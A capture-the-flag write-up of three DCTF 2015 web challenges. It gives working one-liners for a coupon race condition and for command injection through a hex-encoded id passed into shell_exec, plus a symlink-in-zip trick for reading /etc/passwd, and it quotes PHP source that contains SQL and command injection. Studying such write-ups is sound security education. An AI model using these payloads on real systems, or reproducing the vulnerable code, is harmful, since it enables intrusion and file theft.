DCTF 2015 - Web Challenges
by Filippo "fcremo" Cremonese, Alessandro "cube" De Vito
Web100
This challenge was quite straightforward: we only had a textual input field and the suggestion to use the coupon (DCTF_ADD_MONEY). That coupon could normally be used just a single time, but the goal was to get more money than a single coupon would give you.
The challenge could be solved using just the shell and a one liner:
$ curl --data "code=DCTF_ADD_MONEY" -b "PHPSESSID=abcdefghirandomrandom" "http://10.13.37.2/" & curl --data "code=DCTF_ADD_MONEY" -b "PHPSESSID=abcdefghirandomrandom" "http://10.13.37.2/"
Web200
We had a service that allowed you to upload zip files, decompressed them and let you download the contents. There was a comment in the HTML source: getent passwd | grep someuser | cut ...
(sorry, I haven’t saved the specific command).
I created a zip file containing a simbolic link to /etc/passwd
:
$ ln -s /etc/passwd mylink
$ zip archive.zip mylink
I uploaded the archive and… nothing, the website didn’t display my file. The service allowed you to see the debug logs of the unzip command executed server side and in the logs I could see my link was being extracted correctly, so I tried to manually download the passwd file manipulating the download url of another archive I uploaded earlier and it worked!
Web400 (CSS Engineer)
The php code that allowed you to get the user images used cat
$ curl "http://10.13.37.5/?id=2&usr=1"
cat: images/2_6.jpg: No such file or directory
and was vulnerable to command injection. because it constructed the path to output from user input without sanitizing it correctly.
Again, this challenge was doable with a one liner:
$ curl `python2 -c "print 'http://10.13.37.5/?id=0x' + '../*; #'.encode('hex') + '&usr=1"`
The reason this works was because id was used in an SQL query and got converted to a string:
if(isset($_GET['id'], $_GET['usr'])) {
if(!is_numeric($_GET['id']) || !is_numeric($_GET['usr'])) {
die('ID or User ID must be numeric, obviously. Cheers from Bucharest, awesome girls, smoke free. :-) <br><img src="data:image/jpeg;base64,...');
}
$q = mysql_query('SELECT concat('.$_GET['id'].',"_",image) as path FROM images WHERE id="'.$_GET['usr'].'"');
$path = mysql_result($q, 0);
header('Content-Type: image/jpeg');
echo shell_exec("cat images/$path 2>&1");
} else {
echo '<h1>List of some users! I don\'t know CSS! :(</h1>';
$q = mysql_query('SELECT * FROM `images`');
while($row = mysql_fetch_array($q)) {
echo '<h3>'.$row['user'].'</h3>';
echo '<img src="?id='.$row['id'].'&usr='.$row['id'].'">';
}
}